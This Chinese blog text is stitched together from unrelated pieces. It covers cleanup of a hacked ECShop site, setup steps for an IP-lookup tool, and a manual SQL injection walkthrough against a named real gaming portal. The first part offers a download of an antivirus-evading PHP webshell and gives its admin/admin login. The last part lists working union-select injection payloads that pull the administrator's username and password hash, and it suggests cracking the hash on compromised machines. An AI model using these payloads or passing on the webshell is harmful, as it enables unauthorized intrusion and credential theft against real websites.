今天中午同事小张打来电话说公司供货平台网站首页打开时会弹出QQ中奖等乱七八糟的广告，而且网站的无法点击购买了商品了。我想肯定是网站被入侵了，才会被植入恶意广告代码。到工商后我打开查看供货平台网站，右下角弹出一个QQ中奖广告，外加一个弹窗广告，很明显网站被人篡改过了。登陆服务器，找到ECShop的安装目录，按时间排一下顺序，很快找到一只PHP木马，把它打包先收藏了。然后检查首页代码，有好多段Script，链接到一些JS文件。打开JS文件夹，按时间排序，最后一个是common.js，我打开检查了一下，的确链接到了一个网址，并且网址被URL编码了。所以一定有问题了，不加思索就把它删了。还有个问题就是网站里点“立即购买”没反应，状态栏显示网页有错误。我起先认为是ECShop的内核文件被修改过，所以马上打电话给网新的人让他们检查处理，结果他告诉我说这个网站他们已经不管了。没办法，打算自己检查修正。本来下午不打算弄的，因为身体不舒服想挂盐水，不过去楼下的社区卫生服务点，医生检查后说有点热度但不让挂。其实我想挂点滴是想让我的咽喉尽快好一些，这几天疼得厉害，这个星期天要参加事业单位的面试。

　　那也好，我打算下午把网站的事弄好，然后晚上去医院挂。其实已经想到了，那个错误是因为某个JS文件没有起作用导致的。实践证明我的猜想是正确的，被删的common.js是正常文件，只是被入侵者修改而已。原来以为要大动干戈一个个检查文件，现在只把那个还原就OK了。Google一下，发现ECShop的确有漏洞，2.7.1和2.7.2都有，检查版本为2.7.1，补上。再对系统做了一些安全设置，就算完成了。

　　其实以上的你可以不看，我只想把某天自己的经历写一下而已。本文真正想写的是那个PHP木马，上面已经说了收获了一只免杀的PHP木马，至少经我测试最新病毒库的NOD32和Mcafee都没有检查出来，而这个PHP木马并没有加密。 名叫SPS(Spider PHP Shell)v1.0（如下图），网上一搜还有3.0版本的，还有去后门版的， 懒得管了，是免杀的就是好马！提供我捉到的Spider PHP Shell v1.0下载，有没有后门大家自己检测吧！我实在太忙没有时间。喜欢的下载去研究研究：

　　免杀PHP木马点击下载

　　忘记说了，木马的登陆用户名和密码是：admin和admin。

1、下载一个最新的QQWry.dat文件；

2、新建一个目录，例如名为ip，将ip.php拷到该目录下；

3、ip目录下再新建一个目录名为iplib，运行IPFromQQWry.exe，选择“生成文本的数据库及PHP查询代码”，指定目标文件夹为 iplib，设置单个文件大小，随便设，一般为几百K即可。不要太小也不要太大，点生成，会生成一堆数据文件及 info.php。

4、将ip目录下的所有东西上传到支持PHP的服务器，查看ip.php即可。

使用IPFromQQWry要注意的

1、更新数据库，只要将iplib下的文件全删掉，然后再用程序用新的QQWry.dat生成一份即可，查询代码ip.php不用改动。

2、选择“生成access数据库”，可以生成.mdb的access数据库。如果生成失败，请确定机器安装了ADO的驱动程序(一般机器都有)，可以在Windows Update找到MDAC的更新。或者直接在微软网站下载：

http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=6c050fe3-c795-4b7d-b037-185d0506396c

本站会员下载IPFromQQWry — 注册为本站会员即可下载，若已注册请登陆。

　　学PHP比学ASP有前途多了，因为目前很多大型的网站采用PHP程序。17173.com是一家专业性的网络游戏门户网站，目前位居全球简体中文网站第15位，游戏类第1位。这么大的网站安全性如何呢？下面我就拿这个全球中文网络游戏第一门户网站试下手。

　　为了节省时间，我就不一个个地试了，用工具扫下，在一个个人空间里我发现一注入点：

http://vlog.17173.com/*******.php?id=***61

因为是手工注射，接下来我们手工一步一步来。
首先，判断注入点。
and 1=1

返回正常。
and 1=2

有错误提示。
注入基本上应该存在了。

接着，判断MySQL数据库的类型。
提交and ord(mid(version()，1，1)>51 /*

返回正常，说明MySQL的版本在4.0以上(ASCII码为51对应的数值为3)，4.0以上版本的支持UNION查询。

接下来就是判断字段数了。
提交order by 10 /*返回正常；
提交order by 20 /*同样返回正常；
提交order by 30 /*，返回不正常，继续在20和30之间猜解，最终发现order by 25 /*和order by 26 /*分别返回正常与不正常。

OK，字段数就是25！

再下一步就是UNION查询了，提交:
and 1=2 union select 1，2，3，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，22，23，24，25 /*

虽然返回了不同的界面，转到了另一个用户的个人空间界面，但是没有关系，我们本来就是为了让它出错，得到了我们想要的，当前界面上出现了12，2，17，13，3，8，9，6几个数字，这些都是可以查询的字段。

再接下来判断数据库连接帐号有没有写权限。
提交and (select count(*) from mysql.user)>0

返回错误了，没有权限。再试试能不能用load_file()函数读取服务器上的文件，但结果没有成功读取出来。不过我们可以从上图中看到该文件在服务器上的绝对路径：/home/httpd/html/vlog.17173.com.v2/*****.php。从路径中可以判断出，服务器应该是Linux（Unix）操作系统。虽然我玩过一段时间的Linux，但对Linux下的WEB结构不是很熟悉。这个暑假一定得再去好好学习一下Linux。

接着继续。我们知道，MySQL跟MsSQL相似，有自己的内置函数，如当前连接用户user()，版本version()，当前数据库database()。我把2字段替换成user()，再次提交看看：

看到没有?2字段处返回了vlog@10.59.96.39，这就是user()当前的连接用户名。说明WEB与数据库不在同一台服务器上，不然10.59.96.39处应该为localhost。

接下来猜解MySQL的表名，
提交and/**/1=2/**/union/**/select/**/1，user()，3，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，22，23，24，25/**/from/**/admin/* (/**/表示空格)返回失败。
提交and/**/1=2/**/union/**/select/**/1，user()，3，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，22，23，24，25/**/from/**/user/* 返回还是错误。看来表名不是那么好猜。我也不会这么轻易就放弃，继续猜，试了ymdown_user、manager等还是不行。快放弃的时候，试了下admin_user居然成功了！兴奋ing！

接下来我们猜测admin_user这个表中的用户名和密码字段。这个应该不难，不过提交and/**/1=2/**/union/**/select/**/1，password，username，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，22，23，24，25/**/from/**/admin_user/* 返回错误。多试了几下，当试到了pwd和user时返回成功了。我把字段为2处换成pwd，字段为3处(即标签处)换成user。
提交：and/**/1=2/**/union/**/select/**/1，pwd，user，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，22，23，24，25/**/from/**/admin_user/*

仔细看返回的结果，pwd为8c3ad660fb********0315bf5051e6，是MD5散列。而标签处的user变成了administrator，也就是管理员的用户名。

管理员用户名和密码都暴了出来。密码虽然暴出来的是MD5加密散列，但这难不倒我们，有专门的破解网站或用工具在本地或挂肉鸡上跑，只要时间一长，密码自然会破解出来。

最后就是找管理员登陆界面(其实猜用户名和密码字段这一步也可以先找到管理员登陆界面，再查看其源代码得到)。我用几个常用的试了一下，都失败。也难怪，这么大的网站难能这么容易被你找到管理员登陆界面。马上想到了用GOOGLE HACK，但是还是失败。最终这次PHP注射之旅还是因为没有找到管理员登陆口而失败，但我学习到了很多，至少我已经成功爆出了管理员用户名和密码。
当然只要有时间有耐心，管理后台肯定是可以找出来的，我这里不是为了恶意入侵所以没有再继续。漏洞我已经通知发留言通知他们了。应该说这是一般PHP网站手工注射的方法，没什么技术含量，高手见笑了。我花时间写这篇日志不为了什么，只是现在刚学习PHP注射，想到以后回过头来复习时可以方便很多。唉…今天晚上怎么又搞到一点多了，明天还有八节课，赶快睡觉啦！